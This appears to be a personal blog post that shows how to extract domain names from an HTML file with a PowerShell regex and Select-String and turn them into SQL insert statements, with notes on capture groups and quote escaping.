cls
$filename = "c:\Users\Neal\OneDrive\Documents\myFile.html"

# Example of what I'm trying to pick out (note that the pattern below also requires a closing </a> right after it):
# <strong>mydomainname.com</strong>
$regexPattern = "<strong>(.*?)</strong></a>"

gc $filename | Select-String -Pattern $regexPattern -AllMatches | ForEach-Object {$_.matches.groups[1].value}

Note that each match returns two groups, with subscripts 0 and 1. Subscript 0 contains the entire match, including the “strong” tags around it. Subscript 1 contains just the captured text, which is why I put groups[1].value in the logic above. Groups is a collection of group objects, each with several properties; “Value” is the one we need here (see related blogs below).
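To make the two subscripts concrete, here is a minimal sketch that runs the same pattern against a single sample line. The sample line and the two domain names are made up for illustration; they are not from my real file. It also loops over every match on the line, because as far as I can tell groups[1] on a line with several matches picks up only the first one.

```powershell
# Sample line (made up for illustration) containing two matches.
$sampleLine = '<a href="#"><strong>example-one.com</strong></a> <a href="#"><strong>example-two.com</strong></a>'
$regexPattern = "<strong>(.*?)</strong></a>"

$result = $sampleLine | Select-String -Pattern $regexPattern -AllMatches

# Groups[0] is the whole match, tags included; Groups[1] is the captured text.
$firstMatch = $result.Matches[0]
$firstMatch.Groups[0].Value   # <strong>example-one.com</strong></a>
$firstMatch.Groups[1].Value   # example-one.com

# Walk every match on the line so that none is skipped.
$domains = $result.Matches | ForEach-Object { $_.Groups[1].Value }
$domains
```

If each line of the file holds at most one domain, the shorter groups[1].value form gives the same result.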

We can take it to the next level and generate SQL statements that insert those domains into a SQL table.
This is done with one long line of code, using the pipeline (piping).

gc $filename | Select-String -Pattern $regexPattern -AllMatches  |  ForEach-Object {Write-Host "insert into domains values ('$($_.matches.groups[1].value)')"} 

The output, written to the console, is a list of insert statements, one per matching domain name.
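Write-Host writes to the console rather than to the pipeline, so the statements are awkward to save. Here is a rough sketch of one alternative: emit plain strings and double any single quote in the captured text so it cannot end the SQL string early. The $domains array and the output file name are hypothetical stand-ins for the regex results, used only to keep the example self-contained.

```powershell
# Hypothetical captured values, standing in for the regex matches above.
$domains = @('mydomainname.com', "o'brien-example.com")

$statements = $domains | ForEach-Object {
    # Double any single quote so it cannot end the SQL string literal early.
    $escaped = $_ -replace "'", "''"
    "insert into domains values ('$escaped')"
}

# Plain strings go to the pipeline, so they can be printed or saved.
$statements
# To save them instead: $statements | Set-Content -Path .\insert-domains.sql
```

Real domain names should never contain a quote, so the escaping is only a safety net for unexpected text between the tags.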

References that helped me get this:

https://powershell.org/forums/topic/how-to-get-a-regex-group-from-a-select-string-cmdlet/

https://stackoverflow.com/questions/25064249/command-line-to-extract-all-domain-names-referenced-in-a-file

See also my related blog on PowerShell Regex and the objects that it returns (below).

 

 
